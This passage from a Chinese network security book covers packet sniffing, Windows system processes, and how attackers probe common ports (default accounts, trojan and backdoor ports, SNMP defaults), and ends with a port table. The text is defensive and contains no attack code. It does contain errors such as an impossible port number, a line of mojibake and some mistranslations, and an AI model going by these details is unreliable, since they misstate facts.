　　当连接在同一条电缆或集线器上的主机被逻辑地分为几个子网时，如果一台主机处于监听模式下，它还能接收到发向与自己不在同一子网（使用了不同的掩码、IP地址和网关）的主机的那些信包。也就是说，在同一条物理信道上传输的所有信息都可以被接收到。

　　许多人会问：能不能监听不在同一个网段计算机传输的信息。答案是否定的，一台计算机只能监听经过自己网络接口的那些信包。否则，我们将能监听到整个Internet,情形会多么可怕。

目前的绝大多数计算机网络使用共享的通信信道。从上面的讨论中，我们知道，通信信道的共享意味着，计算机有可能接收发向另一台计算机的信息。

　　另外，要说明的是，Internet中使用的大部分协议都是很早设计的，许多协议的实现都是基于一种非常友好的，通信的双方充分信任的基础之上。因此，直到现在，网络安全还是非常脆弱的。在通常的网络环境下，用户的所有信息，包手户头和口令信息都是以明文的方式在网上传输。因此，对于一个网络黑客和网络攻击者进行网络监听，获得用户的各种信息并不是一件很困难的事。只要具有初步的网络和TCP/IP协议知识，便能轻易地从监听到的信息中提取出感兴趣的部分。

　　网络监听常常要保存大量的信息，对收集的信息进行大量的整理工作，因此，正在进行监的机器对用户的请求响应很慢。

　　首先，网络监听软件运行时，需要消耗大量的处理器时间，如果在此时，就详细地分析包中的内容，许多包就会来不信接收而漏掉。因此，网络监听软件通常都是将监听到的包存放在文件中，待以后再分析。

　　其次，网络中的数据包非常复杂，两台主机之间即使连续发送和接受数据包，在监听到的结果中，中间必然会夹杂了许多别的主机交互的数据包。监听软件将同一TCP会话的包整理到一起，已经是很不错了。如果还希望将用户的详细信息整理出眯，需要根据协议对包进行大量的分析。面对网络上如此众多的协议，这个监听软件将会十分庞大。

　　其实，找这些信息并不是一件难事。只要根据一定的规律，很容易将有用的信息一一提取出来。

 

(本章完)

[(第16章 系统进程信息)]

[system process] – [system process] – 进程信息

进程文件: [system process] or [system process]

进程名称: Windows内存处理系统进程

描述: Windows页面内存管理进程，拥有0级优先。

alg – alg.exe – 进程信息

进程文件: alg or alg.exe

进程名称: 应用层网关服务

描述: 这是一个应用层网关服务用于网络共享。

csrss – csrss.exe – 进程信息

进程文件: csrss or csrss.exe

进程名称: Client/Server Runtime Server Subsystem

描述: 客户端服务子系统，用以控制Windows图形相关子系统。

ddhelp – ddhelp.exe – 进程信息

进程文件: ddhelp or ddhelp.exe

进程名称: DirectDraw Helper

描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。

dllhost – dllhost.exe – 进程信息

进程文件: dllhost or dllhost.exe

进程名称: DCOM DLL Host进程

描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。

explorer – explorer.exe – 进程信息

进程文件: explorer or explorer.exe

进程名称: 程序管理

描述: Windows Program Manager或者Windows Explorer用于控制Windows图形Shell，包括开始菜单、任务栏，桌面和文件管理。

inetinfo – inetinfo.exe – 进程信息

进程文件: inetinfo or inetinfo.exe

进程名称: IIS Admin Service Helper

描述: InetInfo是Microsoft Internet Infomation Services （IIS）的一部分，用于Debug调试除错。

internat – internat.exe – 进程信息

进程文件: internat or internat.exe

进程名称: Input Locales

描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。

kernel32 – kernel32.dll – 进程信息

进程文件: kernel32 or kernel32.dll

进程名称: Windows壳进程

描述: Windows壳进程用于管理多线程、内存和资源。

lsass – lsass.exe – 进程信息

进程文件: lsass or lsass.exe

进程名称: 本地安全权限服务

描述: 这个本地安全权限服务控制Windows安全机制。

mdm – mdm.exe – 进程信息

进程文件: mdm or mdm.exe

进程名称: Machine Debug Manager

描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft script Editor脚本编辑器。

mmtask – mmtask.tsk – 进程信息

进程文件: mmtask or mmtask.tsk

进程名称: 多媒体支持进程

描述: 这个Windows多媒体后台程序控制多媒体服务，例如MIDI。

mprexe – mprexe.exe – 进程信息

进程文件: mprexe or mprexe.exe

进程名称: Windows路由进程

描述: Windows路由进程包括向适当的网络部分发出网络请求。

msgsrv32 – msgsrv32.exe – 进程信息

进程文件: msgsrv32 or msgsrv32.exe

进程名称: Windows信使服务

描述: Windows信使服务调用Windows驱动和程序管理在启动。

mstask – mstask.exe – 进程信息

进程文件: mstask or mstask.exe

进程名称: Windows计划任务

描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。

regsvc – regsvc.exe – 进程信息

进程文件: regsvc or regsvc.exe

进程名称: 远程注册表服务

描述: 远程注册表服务用于访问在远程计算机的注册表。

rpcss – rpcss.exe – 进程信息

进程文件: rpcss or rpcss.exe

进程名称: RPC Portmapper

描述: Windows 的RPC端口映射进程处理RPC调用（远程模块调用）然后把它们映射给指定的服务提供者。

services – services.exe – 进程信息

进程文件: services or services.exe

进程名称: Windows Service Controller

描述: 管理Windows服务。

smss – smss.exe – 进程信息

进程文件: smss or smss.exe

进程名称: Session Manager Subsystem

描述: 该进程为会话管理子系统用以初始化系统变量，MS-DOS驱动名称类似LPT1以及COM，调用Win32壳子系统和运行在Windows登陆过程。

snmp – snmp.exe – 进程信息

进程文件: snmp or snmp.exe

进程名称: Microsoft SNMP Agent

描述: Windows简单的网络协议代理（SNMP）用于监听和发送请求到适当的网络部分。

spool32 – spool32.exe – 进程信息

进程文件: spool32 or spool32.exe

进程名称: Printer Spooler

描述: Windows打印任务控制程序，用以打印机就绪。

spoolsv – spoolsv.exe – 进程信息

进程文件: spoolsv or spoolsv.exe

进程名称: Printer Spooler Service

描述: Windows打印任务控制程序，用以打印机就绪。

stisvc – stisvc.exe – 进程信息

进程文件: stisvc or stisvc.exe

进程名称: Still Image Service

描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。

svchost – svchost.exe – 进程信息

进程文件: svchost or svchost.exe

进程名称: Service Host Process

描述: Service Host Process是一个标准的动态连接库主机处理服务。

system – system – 进程信息

进程文件: system or system

进程名称: Windows System Process

描述: Microsoft Windows系统进程。

taskmon – taskmon.exe – 进程信息

进程文件: taskmon or taskmon.exe

进程名称: Windows Task Optimizer

描述: windows任务优化器监视你使用某个程序的频率，并且通过加载那些经常使用的程序来整理优化硬盘。

tcpsvcs – tcpsvcs.exe – 进程信息

进程文件: tcpsvcs or tcpsvcs.exe

进程名称: TCP/IP Services

描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。

winlogon – winlogon.exe – 进程信息

进程文件: winlogon or winlogon.exe

进程名称: Windows Logon Process

描述: Windows NT用户登陆程序。

winmgmt – winmgmt.exe – 进程信息

进程文件: winmgmt or winmgmt.exe

进程名称: Windows Management Service

描述: Windows Management Service透过Windows Management Instrumentation data （WMI）技术处理来自应用客户端的请求

(本章完)

[(第17章 端口全解析（上）)]

端口可分为3大类：

1） 公认端口（Well Known Ports）：从0到1023，它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服 务的协议。例如：80端口实际上总是HTTP通讯。

2） 注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。

3） 动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。

　　本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住：并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣，请参看本文的其它部分。0通常用于分析操作系统。这一方法能够工作是因为在一些系统中”0″是无效端口，当你试 图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描：使用IP地址为 0.0.0.0，设置ACK位并在以太网层广播。 1 tcpmux 这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者，缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户，如lp,guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux 并利用这些帐户。 7Echo你能看到许多人们搜索Fraggle放大器时，发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环（echo-loop），攻击者伪造从一个机器发送到另一个UDP数据包，而两个机器分别以它们最快的方式回应这些数据包。（参见Chargen） 另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做Resonate Global Dispatch”，它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDPecho：”如果将cache的source_ping on选项打开，它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat这是一种UNIX服务，它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全，如暴露已知某些弱点或帐户的程序。这与UNIX系统中”ps”命令的结果相似再说一遍：ICMP没有端口，ICMP port 11通常是ICMPtype=1119 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时，会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击伪造两 个chargen服务器之间的UDP由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

21 ftp最常见的攻击者用于寻找打开”anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或tackers利用这些服务器作为传送warez （私有程序） 和pr0n（故意拼错词而避免被搜索引擎分类）的节点。

22 sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式，许多使用RSAREF库的版本有不少漏洞。（建议在其它端口运行ssh）还应该注意的是ssh工具包带有一个称为ake-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP（而不是TCP）与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632 （十六进制的0x1600）位交换后是0x0016（使进制的22）。

23 Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术，入侵者会找到密码。

25 smtp攻击者（spammer）寻找**TP服务器是为了传递他们的spam。入侵者的帐户总被关闭，他们需要拨号连接到高带宽的e-mail服务器上，将简单的信息传递到不同的地址。**TP服务器（尤其是sendmail）是进入系统的最常用方法之一，因为它们必须完整的暴露于Internet且邮件的路由是复杂的（暴露+复杂=弱点）。

53 DNSHacker或crackers可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其它通讯。因此防火墙常常过滤或记录53端口。 需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

67和68 Bootp和DHCPUDP上的Bootp/DHCP：通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的”中间人”（man-in-middle）攻击。客户端向68端口（bootps）广播请求配置，服务器向67端口（bootpc）广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。69 TFTP（UDP） 许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件，如密码文件。它们也可用于向系统写入文件

79 finger Hacker用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuidroot，信任局域网，在/tmp下建立Internet可访问的文件，LANG环境变量有缓冲区溢出。 此外因为它包含整合的服务器，许多典型的HTTP漏洞可能存在（缓冲区溢出，历遍目录等）109 POP2并不象POP3那样有名，但许多服务器同时提供两种服务（向后兼容）。在同一个服务器上POP3的漏洞在POP2中同样存在。

110 POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个（这意味着Hacker可以在真正登陆前进入系统）。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常 见RPC服务有：pc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供 服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer，你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth .这是一个许多机器上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息（会被Hacker利用）。但是它可作为许多服务的记录器，尤其是FTP, POP, IMAP, **TP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，你将会看到许多这个端口的连接请求。记住，如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回T，着将回停止这一缓慢的连接。

119 NNTP news新闻组传输协议，承载USENET通讯。当你链接到诸如：news:p.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end- point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用 机器上的end-point mapper注册它们的位置。远端客户连接到机器时，它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如：这个机器上运 行Exchange Server吗？是什么版本？ 这个端口除了被用来查询服务（如使用epdump）还可以被用于直接攻击。有一些DoS攻 击直接针对这个端口。

137 NetBIOS name service nbtstat （UDP）这是防火墙管理员最常见的信息，请仔细阅读文章后面的NetBIOS一节 139 NetBIOS　File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/**B服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。 大量针对这一端口始于1999，后来逐渐变少。2000年又有回升。一些vbs（IE5 VisualBasicscripting）开始将它们自己拷贝到这个端口，试图在这个端口繁殖。

143 IMAP和上面POP3的安全问题一样，许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住：一种Linux蠕虫（admw0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后，这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2，但并不流行。 已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP（UDP）入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中，通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码”public””private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect rmote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名，你会看见这种包在子网内广播（cable modem, DSL）查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台，它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息

553 CORBA IIOP （UDP） 如果你使用cable modem或DSL VLAN，你将会看到这个端口的广播。CORBA是一种面向对象的RPC（remote procedure call）系统。Hacker会利用这些信息进入系统。 600 Pcserver backdoor 请查看1524端口一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统– Alan J. Rosenthal.

 

(本章完)

[(第18章 端口全解析（下）)]

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的，但基于TCP 的mountd有所增加（mountd同时运行于两个端口）。记住，mountd可运行于任何端口（到底在哪个端口，需要在端口111做portmap查询），只是Linux默认为635端口，就象NFS通常运行于2049端口1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络，它们请求操作系统为它们分配”下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点，你可以重启机器，打开Telnet，再打开一个窗口运行”natstat -a”，你将会看到Telnet被分配1024端口。请求的程序越多，动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍，当你浏览Web页时用”netstat”查看，每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙，允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置，它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机，从而掩饰他们对你的直接攻击。 WinGate是一种常见的Windows个人防火墙，常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口，但常常是sscan脚本的一部分。

1243 Sub-7木马（TCP）参见Subseven部分。

1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口（尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本，如statd,ttdbserver和cmsd）。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图，很可能是上述原因。你可以试试Telnet到你的机器上的这个端口，看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。

2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口，但是大部分情况是安装后NFS杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口： 000/8001/8080/8888。扫描这一端口的另一原因是：用户正在进入聊天室。其它用户（或服务器本身）也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。

5632 pcAnywere你会看到很多这个端口的扫描，这依赖于你所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能得代理（译者：指agent而不是proxy）。Hacker/cracker也会寻找开放这种服务的机器，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器，而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时，他们将会看到持续的，在这个端口的连接企图。（译者：即看到防火墙报告这一端口的连接企图时，并不表示你已被Sub-7控制。）6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的接。这一程序对于建立连接非常具有”进攻性”。它会”驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户，从另一个聊天者手中”继承”了IP地址这种情况就会发生：好象很多不同的人在测试这一端口。这一协议使用”OPNG”作为其连接企图的前四个字节。

17027 Conducent这是一个外向连接。这是由于公司内部有人安装了带有Conducent adbot 的共享软件。Conducent adbot是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验：阻断这一外向连接不会有任何问题，但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载： 机器会不断试图解析DNS名─ads.conducent.com，即IP地址216.33.210.40 ； 216.33.199.77 ；216.33.199.80 ；216.33.199.81；216.33.210.41。（译者：不知NetAnts使用的Radiate是否也有这种现象）

27374 Sub-7木马（TCP） 参见Subseven部分。

30100 NetSphere木马（TCP） 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “eliteHacker中31337读做”elite”/ei’li:t/（译者：法语，译为中坚力量，精华。即 3=E, 1=L, 7=T）。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少，其它的 木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于Hack-a-tack远程访问木马（RAT,Remote Access Trojan）。这种木马包含内置的31790端口扫描器，因此任何31789端口到317890端口的连 接意味着已经有这种入侵。（31789端口是控制连接，317890端口是文件传输连接）

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说：早期版本的Solaris（2.5.1之前）将 portmapper置于这一范围内，即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。 扫描这一范围内的端口不是为了寻找portmapper，就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包（且只在此范围之内）则可能是由于traceroute。参见traceroute分。

41508 Inoculan早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见 http://www.circlemud.org/~jelson/software/udpsend.html

http://www.ccd.bnl.gov/nss/tips/inoculan/index.html

端口1~1024是保留端口，所以它们几乎不会是源端口。但有一些例外，例如来自NAT机器的连接。 常看见紧接着1024的端口，它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的”动态端口”。 Server Client 服务描述

1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

20/tcp 动态 FTP FTP服务器传送文件的端口

53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

123 动态 S/NTP 简单网络时间协议（S/NTP）服务器运行的端口。它们也会发送到这个端口的广播。

27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器（IP asquerade）

 

(本章完)

[(第19章 端口详细说明表（上）)]

1　tcpmux　TCPPortServiceMultiplexer　传输控制协议端口服务多路开关选择器

2　compressnet　ManagementUtility　　compressnet管理实用程序

3　compressnet　CompressionProcess　　压缩进程

5　rje　RemoteJobEntry　　　　远程作业登录

7　echo　Echo　　　　　　回显

9　discard　Discard　　　　丢弃

11　systat　ActiveUsers　　　　在线用户

13　daytime　Daytime　　　　　时间

17　qotd　QuoteoftheDay　　　每日引用

18　msp　MessageSendProtocol　　　消息发送协议

19　chargen　CharacterGenerator　　字符发生器

20　ftp-data　FileTransfer[DefaultData]　文件传输协议（默认数据口）　

21　ftp　FileTransfer[Control]　　　文件传输协议（控制）

22　ssh　SSHRemoteLoginProtocol　　SSH远程登录协议

23　telnet　Telnet　　　　终端仿真协议

24　anyprivatemailsystem　　　预留给个人用邮件系统

25　smtp　SimpleMailTransfer　　　简单邮件发送协议

27　nsw-fe　NSWUserSystemFE　　　NSW用户系统现场工程师

29　msg-icp　MSGICP　　　　　MSG　ICP

31　msg-auth　MSGAuthentication　　MSG验证

33　dsp　DisplaySupportProtocol　　显示支持协议

35　anyprivateprinterserver　　预留给个人打印机服务

37　time　Time　　　　　　时间

38　rap　RouteAccessProtocol　　　路由访问协议

39　rlp　ResourceLocationProtocol　　资源定位协议

41　graphics　Graphics　　　　图形

42　nameserver　WINSHostNameServer　　WINS主机名服务

43　nicname　WhoIs　　　　绰号whois服务

44　mpm-flags　MPMFLAGSProtocol　　MPM（消息处理模块）标志协议

45　mpm　MessageProcessingModule[recv]　消息处理模块　

46　mpm-snd　MPM[defaultsend]　　　消息处理模块（默认发送口）

47　ni-ftp　NIFTP　　　　NIFTP

48　auditd　DigitalAuditDaemon　　数码音频后台服务49　tacacs　LoginHostProtocol（TACACS）　TACACS登录主机协议50　re-mail-ckRemoteMailCheckingProtocol　远程邮件检查协议[未结束]

51　la-maint　IMPLogicalAddressMaintenance　IMP（接口信息处理机）逻辑地址维护

52　xns-time　XNSTimeProtocol　　　施乐网络服务系统时间协议

53　domain　DomainNameServer　　　域名服务器

54　xns-ch　XNSClearinghouse　　　　施乐网络服务系统票据交换55　isi-gl　ISIGraphicsLanguage　　ISI图形语言

56　xns-auth　XNSAuthentication　　施乐网络服务系统验证

57　?　anyprivateterminalaccess　　预留个人用终端访问

58　xns-mail　XN**ail　　　　施乐网络服务系统邮件

59　anyprivatefileservice　　　预留个人文件服务

60　Unassigned　　　　　未定义

61　ni-mail　NIMAIL　　　　　NI邮件?

62　acas　ACAServices　　　　异步通讯适配器服务

63　whois+whois+　　　　　WHOIS+

64　covia　CommunicationsIntegrator（CI）　通讯接口　

65　tacacs-ds　TACACS-DatabaseService　　TACACS数据库服务

66　sql*net　OracleSQL*NET　　　OracleSQL*NET

67　bootps　BootstrapProtocolServer　　引导程序协议服务端

68　bootpc　BootstrapProtocolClient　　引导程序协议客户端

69　tftp　TrivialFileTransfer　　　小型文件传输协议

70　gopher　Gopher　　　　信息检索协议

71　netrjs-1　RemoteJobService　　远程作业服务

72　netrjs-2　RemoteJobService　　远程作业服务

73　netrjs-3　RemoteJobService　　远程作业服务

74　netrjs-4　RemoteJobService　　远程作业服务

75　anyprivatedialoutservice　　预留给个人拨出服务

76deos　DistributedExternalObjectStore分布式外部对象存储　

77　anyprivateRJEservice　　　预留给个人远程作业输入服务

78　vettcp　vettcp　　　　修正TCP?

79　finger　Finger　　　　查询远程主机在线用户等信息

80　http　WorldWideWebHTTP　　　　全球信息网超文本传输协议81　hosts2-ns　HOSTS2NameServer　　HOST2名称服务

82　xfer　XFERUtility　　　　传输实用程序

83　mit-ml-dev　MITMLDevice　　　　模块化智能终端ML设备

84　ctf　CommonTraceFacility　　　公用追踪设备

85　mit-ml-dev　MITMLDevice　　　　模块化智能终端ML设备

86　mfcobol　MicroFocusCobol　　　MicroFocusCobol编程语言

87　anyprivateterminallink　　预留给个人终端连接

88　kerberos　Kerberos　　　　Kerberros安全认证系统

89　su-mit-tg　SU/MITTelnetGateway　　SU/MIT终端仿真网关

90　dnsix　DNSIXSecuritAttributeTokenMap　DNSIX安全属性标记图91　mit-dov　MITDoverSpooler　　　MITDover假脱机

92　npp　NetworkPrintingProtocol　　网络打印协议

93　dcp　DeviceControlProtocol　　设备控制协议

94　objcall　TivoliObjectDispatcher　　Tivoli对象调度

95　supdup　SUPDUP　　　　

96　dixie　DIXIEProtocolSpecification　　DIXIE协议规范

97ft-rvfftRemoteVirturalFileProtocol）快速远程虚拟文件协议98　tacnews　TACNews　　　　　TAC新闻协议

99　metagram　MetagramRelay　　　　

100　newacct　[unauthorizeduse]

101=NICHostNameServer

102=ISO-TSAP

103=GenesisPoint-to-PointTransNet

104=ACR-NEMADigitalImag.&Comm.300

105=MailboxNameNameserver

106=3COM-T**UX3com-tsmux

107=RemoteTelnetService

108=SNAGatewayAccessServer

109=PostOfficeProtocol-Version2

110=PostOfficeProtocol-Version3

111=SUNRPC

112=McIDASDataTransmissionProtocol

113=AuthenticationService

114=AudioNewsMulticast

115=SimpleFileTransferProtocol

116=ANSAREXNotify

117=UUCPPathService

118=SQLServicessqlserv

119=NetworkNewsTransferProtocol

120=CFDPTKTcfdptkt

121=EncoreExpeditedRemotePro.Call

122=**AKYNETsmakynet

123=NetworkTimeProtocol

124=ANSAREXTrader

125=LocusPC-Inte**ceNetMapSer

126=UnisysUnitaryLogin

127=LocusPC-Inte**ceConnServer

128=GSSXLicenseVerification

129=PasswordGeneratorProtocol

130=ciscoFNATIVE

131=ciscoTNATIVE

132=ciscoSY**AINT

133=StatisticsService

134=INGRES-NETService

135=LocationService

136=PROFILENamingSystem

137=NETBIOSNameService

138=NETBIOSDatagramService

139=NETBIOSSessionService

140=EMFISDataService

141=EMFISControlService

142=Britton-LeeIDM

143=InterimMailAccessProtocolv2

144=NewSnews

145=UAACProtocoluaac

146=ISO-IP0iso-tp0

147=ISO-IPiso-ip

148=CRONUS-SUPPORT

149=AED512EmulationService

150=SQL-NETsql-net

151=HEMShems

152=BackgroundFileTransferProgram

153=SGMPsgmp

154=NETSCnetsc-prod

155=NETSCnetsc-dev

156=SQLService

157=KNET/VMCommand/MessageProtocol

158=PCMailServerpcmail-srv

159=NSS-Routingnss-routing

160=SGMP-TRAPSsgmp-traps

161=SNMP

162=SNMPTRAP

163=CMIP/TCPManager

164=CMIP/TCPAgent

165=Xeroxxns-courier

166=SiriusSystems

167=NAMPnamp

168=RSVDrsvd

169=Send

170=NetworkPostscript

170=NetworkPostscript

171=NetworkInnovationsMultiplex

172=NetworkInnovationsCL/1

173=Xyplexxyplex-mux

174=MAILQ

175=VMNET

176=GENRAD-MUXgenrad-mux

177=XDisplayManagerControlProtocol

178=NextStepWindowServer

179=BorderGatewayProtocol

180=Intergraphris

181=Unifyunify

182=UnisysAuditSITP

183=OCBinderocbinder

184=OCServerocserver

185=Remote-KIS

186=KISProtocolkis

187=ApplicationCommunicationInte**ce

188=PlusFive’sMUMPS

189=QueuedFileTransport

189=QueuedFileTransport

190=GatewayAccessControlProtocol

190=GatewayAccessControlProtocol

191=ProsperoDirectoryService

191=ProsperoDirectoryService

192=OSUNetworkMonitoringSystem

193=srmp,SpiderRemoteMonitoringProtocol

194=irc,InternetRelayChatProtocl

195=DNSIXNetworkLevelModuleAudit

196=DNSIXSessionMgtModuleAuditRedir

197=DirectoryLocationService

198=DirectoryLocationServiceMonitor

199=**UX

200=IBMSystemResourceController

201=at-rtmpAppleTalkRoutingMaintenance

202=at-nbpAppleTalkNameBinding

203=at-3AppleTalkUnused

204=AppleTalkEcho

205=AppleTalkUnused

206=AppleTalkZoneInformation

207=AppleTalkUnused

208=AppleTalkUnused

209=TrivialAuthenticatedMailProtocol

210=ANSIZ39.50z39.50

211=TexasInstruments914C/GTerminal

212=ATEXSSTRanet

213=IPX

214=VMPWSCSvmpwscs

215=InsigniaSolutions

216=AccessTechnologyLicenseServer

217=dBASEUnix

218=NetixMessagePostingProtocol

219=UnisysARPsuarps

220=InteractiveMailAccessProtocolv3

221=BerkeleyrlogindwithSPXauth

222=BerkeleyrshdwithSPXauth

223=CertificateDistributionCenter

